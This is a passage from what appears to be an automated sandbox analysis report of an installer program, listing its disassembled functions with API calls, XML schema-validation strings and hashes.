                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3Path$AllocCloseCombineException@8HandleModuleNamePointerReadRelativeStringThrow
                                                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                              • API String ID: 3690754453-4172873023
                                                                                              • Opcode ID: 0a9bb247d21431e3cf6afb9e9342899681df9bdf4d3243e5a45ce9aaa5f72603
                                                                                              • Instruction ID: fa9c981e31767fe90c8bbf1d42d244a69f45e5b444c7ba6dd4f21fcd3cd00c7b
                                                                                              • Opcode Fuzzy Hash: 0a9bb247d21431e3cf6afb9e9342899681df9bdf4d3243e5a45ce9aaa5f72603
                                                                                              • Instruction Fuzzy Hash: FA914575904219AFDF01DFA8C8849DEBBB9EF5AB28F104515F511BB282C730EA558FA0
                                                                                              Function 6C8E473C Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210commemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8E4746
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8C388B: __EH_prolog3.LIBCMT ref: 6C8C3892
                                                                                                • Part of subcall function 6C8E4464: __EH_prolog3.LIBCMT ref: 6C8E446B
                                                                                                • Part of subcall function 6C8E4682: __EH_prolog3.LIBCMT ref: 6C8E4689
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8E47F7
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C8E4815
                                                                                                • Part of subcall function 6C909D05: GetCommandLineW.KERNEL32(38D98A99,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C909D54
                                                                                              • CoUninitialize.COMBASE(02F92298,00000000,?,?,succeeded,6C8BA794,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738), ref: 6C8E48F0
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C8E48F9
                                                                                              • SysAllocString.OLEAUT32(?), ref: 6C8E492E
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E49BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
                                                                                              • String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
                                                                                              • API String ID: 1482071144-3644667230
                                                                                              • Opcode ID: 6a9c87901c6da982a76763894a092b3d476ab1863d80f0fada53a03cb2a62a9e
                                                                                              • Instruction ID: 933f730909b9000a7d2c68373fbe2a8cd1175c7e3f79824ccf70e611b4d47044
                                                                                              • Opcode Fuzzy Hash: 6a9c87901c6da982a76763894a092b3d476ab1863d80f0fada53a03cb2a62a9e
                                                                                              • Instruction Fuzzy Hash: 56816A70900249EFCB10DFE8C984ADE7BB9AF8A318F108959F418EB741C775DA05CBA1
                                                                                              Function 639531A0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639531A7
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • _wcschr.LIBCMT ref: 639531E8
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639532A2
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,63966F33,?,?,00000000,00000044,6396668B,?,00000000,00000000,?,?,succeeded), ref: 639532B9
                                                                                              • PathFileExistsW.SHLWAPI(00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 639532C6
                                                                                              • PathFileExistsW.KERNELBASE(?,00000000,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63953307
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 6395330A
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6394D170: __EH_prolog3.LIBCMT ref: 6394D177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                                                              • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s$^wu
                                                                                              • API String ID: 1926448744-3220900665
                                                                                              • Opcode ID: 451aa20cd6f1ebb7792ec9a53b26b2897ff0c2667a671846973b700e49af4341
                                                                                              • Instruction ID: ae15d62e4608942f40c0d6b654a64901e00f8d54d5b4264faeb7b08ed0eb2cdc
                                                                                              • Opcode Fuzzy Hash: 451aa20cd6f1ebb7792ec9a53b26b2897ff0c2667a671846973b700e49af4341
                                                                                              • Instruction Fuzzy Hash: 18716BB1804249EFDF00DBF8C984ADEBBB8AF16B28F544555F410A7281DB30EA58CF61
                                                                                              Function 6395BF84 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 80windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 6395BF93
                                                                                              • GetForegroundWindow.USER32 ref: 6395BFBB
                                                                                              • SetForegroundWindow.USER32(?), ref: 6395BFF4
                                                                                              • IsWindowVisible.USER32(?), ref: 6395BFD3
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              • _memset.LIBCMT ref: 6395C021
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000000,?), ref: 6395C043
                                                                                              • GetMenuItemInfoW.USER32(00000000), ref: 6395C04A
                                                                                              • PostMessageW.USER32(?,0000067C,00000000,00000000), ref: 6395C080
                                                                                              Strings
                                                                                              • 0, xrefs: 6395C035
                                                                                              • WM_ACTIVATEAPP: Focus stealer's windows was NOT visible, taking back focus, xrefs: 6395BFE3
                                                                                              • WM_ACTIVATEAPP: Focus stealer's windows WAS visible, NOT taking back focus, xrefs: 6395BFFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundMenu$H_prolog3InfoItemLongMessagePostSystemVisible_memset
                                                                                              • String ID: 0$WM_ACTIVATEAPP: Focus stealer's windows WAS visible, NOT taking back focus$WM_ACTIVATEAPP: Focus stealer's windows was NOT visible, taking back focus
                                                                                              • API String ID: 105400089-2282623533
                                                                                              • Opcode ID: 17b5cf17c1f15cba593a1caf0df74a0325649fe33f77aba3300e6fdcac7003c9
                                                                                              • Instruction ID: f95031b04abad85f80c1534831f58ee47b7d0605fc94a510af7520de4a64cda4
                                                                                              • Opcode Fuzzy Hash: 17b5cf17c1f15cba593a1caf0df74a0325649fe33f77aba3300e6fdcac7003c9
                                                                                              • Instruction Fuzzy Hash: E9212E32944209BFEF10AFB0DC09B893B68EB05BA5F148015FA15A91D1D7B1D5A0CFA9
                                                                                              Function 63966EE2 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 369COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966EE9
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 639531A0: __EH_prolog3.LIBCMT ref: 639531A7
                                                                                                • Part of subcall function 639531A0: _wcschr.LIBCMT ref: 639531E8
                                                                                                • Part of subcall function 639531A0: __CxxThrowException@8.LIBCMT ref: 639532A2
                                                                                                • Part of subcall function 639531A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,63966F33,?,?,00000000,00000044,6396668B,?,00000000,00000000,?,?,succeeded), ref: 639532B9
                                                                                                • Part of subcall function 639531A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 639532C6
                                                                                                • Part of subcall function 639545DE: __EH_prolog3.LIBCMT ref: 639545E5
                                                                                                • Part of subcall function 639560C9: __EH_prolog3.LIBCMT ref: 639560D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
                                                                                              • String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
                                                                                              • API String ID: 1182493169-944454811
                                                                                              • Opcode ID: 13745b85b38b7000e796c1aec16195fb742c392789f39309448a2a236dba995c
                                                                                              • Instruction ID: 02d3e9af16454cad7d7ac3bf743b4bf1624b0c09d8c38414467514a93aff5efc
                                                                                              • Opcode Fuzzy Hash: 13745b85b38b7000e796c1aec16195fb742c392789f39309448a2a236dba995c
                                                                                              • Instruction Fuzzy Hash: A4F1797190024DEFEB01DBE8C944BDEBBB8AF19718F184099F154E7282DB35DA45DB21
                                                                                              Function 6C8DE30E Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 365COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8DE315
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8DE62B
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                              • String ID: ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$File$IsPresent$ParameterInfo.xml$schema validation failure: wrong number of File child nodes!
                                                                                              • API String ID: 3417717588-3917201069
                                                                                              • Opcode ID: a4a2adafceb54edc269d6919ac037db1be0e8f73bea6dc7eb386ea6b73aea8c0
                                                                                              • Instruction ID: b41bdfa146d3f3d4adea9bf7baf4549492861a681d9ac73797c67b4cc76c1a41
                                                                                              • Opcode Fuzzy Hash: a4a2adafceb54edc269d6919ac037db1be0e8f73bea6dc7eb386ea6b73aea8c0
                                                                                              • Instruction Fuzzy Hash: 44E17270A05249EFDB14CFA8CA44ADDBBB9BF19318F148959F424EB740C734EA09CB65
                                                                                              Function 6C8E4AD9 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4AE0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C89B7: __EH_prolog3.LIBCMT ref: 6C8C89BE
                                                                                                • Part of subcall function 6C8C89B7: __CxxThrowException@8.LIBCMT ref: 6C8C8A89
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E4E3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
                                                                                              • API String ID: 2489616738-3586895666
                                                                                              • Opcode ID: cb0450e0cb65f1f24edb1827d8e57da3aee7215f883060c810d9d321f4af17fb
                                                                                              • Instruction ID: 40679b67271e2f27193bb78b11c53b07685a331877c1614637302e42877f3af6
                                                                                              • Opcode Fuzzy Hash: cb0450e0cb65f1f24edb1827d8e57da3aee7215f883060c810d9d321f4af17fb
                                                                                              • Instruction Fuzzy Hash: 49C14E71A00249EFCB14DFE8CA45AEEBBB9AF59318F104959F424E7741C734DA09CB61
                                                                                              Function 6C8D6440 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 236COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D6447
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA1FF: __EH_prolog3_catch.LIBCMT ref: 6C8CA206
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D6666
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                              Strings
                                                                                              • schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 6C8D65DA
                                                                                              • HashValue, xrefs: 6C8D649E
                                                                                              • schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 6C8D667A
                                                                                              • CompressedHashValue, xrefs: 6C8D652C
                                                                                              • ParameterInfo.xml, xrefs: 6C8D65E8, 6C8D6688
                                                                                              • URL, xrefs: 6C8D6453
                                                                                              • DownloadSize, xrefs: 6C8D64E3
                                                                                              • CompressedDownloadSize, xrefs: 6C8D6571
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                                                              • String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
                                                                                              • API String ID: 24280941-3047338099
                                                                                              • Opcode ID: 6978fcde2a001e3a8d4627a26c4d346bcbe55876552088431377c5ab7b942f14
                                                                                              • Instruction ID: 85bd3db0b80d62bf4aee934abfa21510aa5c5f5028ca9e98fdbb602d23e502db
                                                                                              • Opcode Fuzzy Hash: 6978fcde2a001e3a8d4627a26c4d346bcbe55876552088431377c5ab7b942f14
                                                                                              • Instruction Fuzzy Hash: 19A16071904649DFCB20CFA8CA44AEEB7B9AF15318F144959F025EBB90C730EA09DB61
                                                                                              Function 6C906782 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 235comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C906789
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C9067DD
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,6C8FFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000), ref: 6C9067FB
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C906A24
                                                                                              • CoUninitialize.COMBASE(?,6C93BE00,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000,?), ref: 6C906A3A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C906A43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
                                                                                              • String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
                                                                                              • API String ID: 2432735026-2443555527
                                                                                              • Opcode ID: 8f0971c2fb283957c318e584cd5a284664e9ac3bd98821a2309f6e4632644b0f
                                                                                              • Instruction ID: cab4aa3e07dccaf1a6e40f5497f92d4b5712eda7d6880d697766553020e1662e
                                                                                              • Opcode Fuzzy Hash: 8f0971c2fb283957c318e584cd5a284664e9ac3bd98821a2309f6e4632644b0f
                                                                                              • Instruction Fuzzy Hash: 1091AE71A00548EFCB00DFE8C984AEDBBB9AF59308F248599E415EBB40C735DE49DB61
                                                                                              Function 6C8C9F34 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C9F3B
                                                                                              • VariantInit.OLEAUT32(00000003), ref: 6C8C9F49
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8C9F83
                                                                                                • Part of subcall function 6C90964C: __get_errno.LIBCMT ref: 6C90966C
                                                                                                • Part of subcall function 6C90964C: __wcstoui64.LIBCMT ref: 6C90968F
                                                                                                • Part of subcall function 6C90964C: __get_errno.LIBCMT ref: 6C9096A1
                                                                                              • __ui64tow_s.LIBCMT ref: 6C8C9FEF
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CA0BC
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C8CA0C2
                                                                                              • VariantClear.OLEAUT32(?), ref: 6C8CA0E9
                                                                                              Strings
                                                                                              • Name, xrefs: 6C8CA121
                                                                                              • schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 6C8CA03C
                                                                                              • schema validation failure: attribute %s missing for %s %s, xrefs: 6C8CA17B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
                                                                                              • String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
                                                                                              • API String ID: 1723289333-1070666262
                                                                                              • Opcode ID: 9e4c4a18927ed7f854d110c11b7cd493e594d1310a29204356e3fea9bcb275b1
                                                                                              • Instruction ID: 35ac64053a027242cb4f9b9f8aacf94a164f989871a29e81c90f570c5b987bb3
                                                                                              • Opcode Fuzzy Hash: 9e4c4a18927ed7f854d110c11b7cd493e594d1310a29204356e3fea9bcb275b1
                                                                                              • Instruction Fuzzy Hash: 23919C71A00248EFCF11CFE8C944ADEBBB5BF19318F14495AE415ABB91CB30DA08DB61
                                                                                              Function 6C8CA8CC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210filememoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • SetFilePointer.KERNEL32(?,00000000,6C8BA794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C8CAA49
                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAA97
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C8CAAAC
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAB2C
                                                                                              Strings
                                                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C8CAAE5
                                                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C8CAA07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
